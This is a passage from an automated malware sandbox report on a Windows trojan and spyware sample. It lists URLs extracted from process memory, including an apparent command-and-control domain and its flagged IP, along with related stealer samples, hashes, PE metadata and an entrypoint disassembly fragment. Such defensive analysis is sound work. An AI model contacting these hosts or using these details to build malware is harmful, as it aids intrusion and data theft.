                  https://shatterbreathepsw.shop/w6BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://shatterbreathepsw.shop/apiiBitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398248173.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://shatterbreathepsw.shop:443/apirosoftBitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://.cssfile.exefalse
                    • Avira URL Cloud: safe
                    		low
                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://shatterbreathepsw.shop/0BitLockerToGo.exe, 00000005.00000003.2462485236.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 15%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://shatterbreathepsw.shop/apiarBitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://shatterbreathepsw.shop/apihortBitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://shatterbreathepsw.shop/&6BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://x1.c.lencr.org/0BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://x1.i.lencr.org/0BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://manage.windowsazure.us/publishsettings/indexMaximumfile.exefalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://management.chinacloudapi.cntoofile.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://shatterbreathepsw.shop/apiTBitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 16%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://.jpgfile.exefalse
                          • Avira URL Cloud: safe
                          		low
                          https://www.mozilla.orBitLockerToGo.exe, 00000005.00000003.2462415774.000000000526A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganalfile.exefalse
                            		high
                            https://manage.windowsazure.com/publishsettings/indexnon-CONNECTfile.exefalse
                              		high
                              https://shatterbreathepsw.shop/D7BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398470292.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://shatterbreathepsw.shop/?6aBitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://shatterbreathepsw.shop/~6BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://shatterbreathepsw.shop/y7BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.file.exefalse
                                      		high
                                      http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comjson:file.exefalse
                                        		high
                                        https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netbadfile.exefalse
                                                  		high
                                                  https://shatterbreathepsw.shop/BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 1%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://database.usgovcloudapi.net/unsupportedfile.exefalse
                                                    		high
                                                    https://shatterbreathepsw.shop/apizenBitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419422712.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://protobuf.dev/reference/go/faq#namespace-conflictLZMAfile.exefalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettinfile.exefalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://databfile.exefalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.95.19
                                                            		shatterbreathepsw.shopUnited States
                                                            		13335CLOUDFLARENETUStrue

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1435406
                                                            Start date and time:2024-05-02 17:03:06 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 10s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:file.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 53%
                                                            • Number of executed functions: 34
                                                            • Number of non-executed functions: 57
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target file.exe, PID 420 because there are no executed function
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            17:04:22API Interceptor8x Sleep call for process: BitLockerToGo.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUShttps://gamma.app/docs/Untitled-9umekc4egyknsobGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                            • 172.67.129.30
                                                            oO2wHSVFJM.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.26.5.15
                                                            9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • 172.64.41.3
                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                            • 162.159.61.3
                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                            • 162.159.61.3
                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                            • 162.159.61.3
                                                            http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                            • 172.64.41.3
                                                            https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$Get hashmaliciousFake CaptchaBrowse
                                                            • 1.1.1.1
                                                            https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$Get hashmaliciousFake CaptchaBrowse
                                                            • 1.1.1.1

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            a0e9f5d64349fb13191bc781f81f42e1oO2wHSVFJM.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            4yFaZU8fhT.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            RY5YJaMEWE.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            MejqsB9tx9.exeGet hashmaliciousAmadeyBrowse
                                                            • 104.21.95.19
                                                            OUZXNOqKXg.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            0BzQNa8hYd.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            3CkMJ4UkNy.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19
                                                            Notice.xlsGet hashmaliciousUnknownBrowse
                                                            • 104.21.95.19
                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                            • 104.21.95.19
                                                            SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exeGet hashmaliciousRisePro StealerBrowse
                                                            • 104.21.95.19

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):6.375467626107391
                                                            TrID:
                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                            • DOS Executable Generic (2002/1) 12.50%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                            File name:file.exe
                                                            File size:9'048'064 bytes
                                                            MD5:7e37f8c945d005226870e60aa2baea93
                                                            SHA1:d8a457a032ead8cc0d692efd497914e8cc69e8a4
                                                            SHA256:d130f492c40697a34e2d1e7b1e9a5e3ba37c7f6b4271271fba6b5c1e9048af8b
                                                            SHA512:d6dfcbd1f7bca1e712bdb184a27c5a06eb1073f03529fd6be9ed2cd231e4906edf9c7bb6fd89453a7e062cc317e4655b19825fdbf7a32d0f2c3ac3ef4bc2f8d6
                                                            SSDEEP:98304:MF3gRcZz6mXSsz06DoWy0hSEVBhG/Y6Pv:IdN6mXSsFo7i/VB9w
                                                            TLSH:35964907ECA148E8C5EDD534866A8222BB727C484B3167D72B60F7782F76BD06E79350
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.^:......^.............@....................................C.....`... ............................

                                                            File Icon

                                                            Icon Hash:0f23493905039619

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x1400014c0
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                            TLS Callbacks:0x4039b680, 0x1, 0x4039b650, 0x1, 0x4039f0f0, 0x1
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:1
                                                            File Version Major:6
                                                            File Version Minor:1
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:1
                                                            Import Hash:c595f1660e1a3c84f4d9b0761d23cd7a

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            dec eax
                                                            mov eax, dword ptr [0086D9B5h]
                                                            mov dword ptr [eax], 00000001h
                                                            call 00007EFCBC8017CFh
                                                            nop
                                                            nop
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            nop dword ptr [eax]
                                                            dec eax
                                                            sub esp, 28h
                                                            dec eax
                                                            mov eax, dword ptr [0086D995h]
                                                            mov dword ptr [eax], 00000000h
                                                            call 00007EFCBC8017AFh
                                                            nop
                                                            nop
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            nop dword ptr [eax]
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007EFCBCBA6A6Ch
                                                            dec eax
                                                            test eax, eax
                                                            sete al
                                                            movzx eax, al
                                                            neg eax
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            dec eax
                                                            lea ecx, dword ptr [00000009h]
                                                            jmp 00007EFCBC801AE9h
                                                            nop dword ptr [eax+00h]
                                                            ret
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            nop
                                                            jmp dword ptr [eax]
                                                            inc edi
                                                            outsd
                                                            and byte ptr [edx+75h], ah
                                                            imul ebp, dword ptr [esp+20h], 203A4449h
                                                            and dh, byte ptr [eax]
                                                            xor cl, byte ptr [bp+66h]
                                                            imul ebx, dword ptr [eax+78h], 79483071h
                                                            xor dword ptr [esi+38h], ecx
                                                            je 00007EFCBC801B89h
                                                            push eax
                                                            push edx
                                                            sub eax, 3979542Fh
                                                            xor dword ptr [eax+69h], edi
                                                            je 00007EFCBC801B53h
                                                            xor al, byte ptr [esi+71h]
                                                            cmp dword ptr [ebp+49h], ebp
                                                            inc edi
                                                            cmp byte ptr [ebp+31h], dl
                                                            inc esi
                                                            jnc 00007EFCBC801B41h
                                                            jne 00007EFCBC801B3Fh
                                                            inc ebx
                                                            insd
                                                            aaa
                                                            push 66635765h
                                                            dec ebx
                                                            pop edi

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x91e0000x4e.edata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x91f0000x1458.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x9230000x4f60.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x8700000x162fc.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9280000x153b0.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x86e7e00x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x91f4940x458.idata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x3a5c200x3a5e00f8cc0bdff922743288e937a3961a4dbcunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .data0x3a70000x823d00x8240006d43a969a86f3483b3c599124c2ac8aFalse0.3443179432581574dBase III DBT, version number 0, next free block index 10, 1st item "dep\011github.com/Azure/azure-sdk-for-go/sdk/internal\011v1.0.0\011h1:jp0dGvZ7ZK0mgqnTSClMxa5xuRL7NZgHameVYF6BurY="5.331801836131035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata0x42a0000x4456100x44580007d9bbc7b7c411e5ccc443da171444fcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                            .pdata0x8700000x162fc0x16400a2b812484ac5efec12dc248df379f18aFalse0.40337517556179775data5.675260072286768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                            .xdata0x8870000xc500xe006ed8a8f76a224934b29fcbe34f6390b0False0.25864955357142855data3.989879659761562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                            .bss0x8880000x95de00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .edata0x91e0000x4e0x200aba40bd052310385c1f231195739ff36False0.08984375data0.6513844786319263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                            .idata0x91f0000x14580x1600b597ce457ec0e4b302a271cacfbfffa2False0.2975852272727273data4.351283065220556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
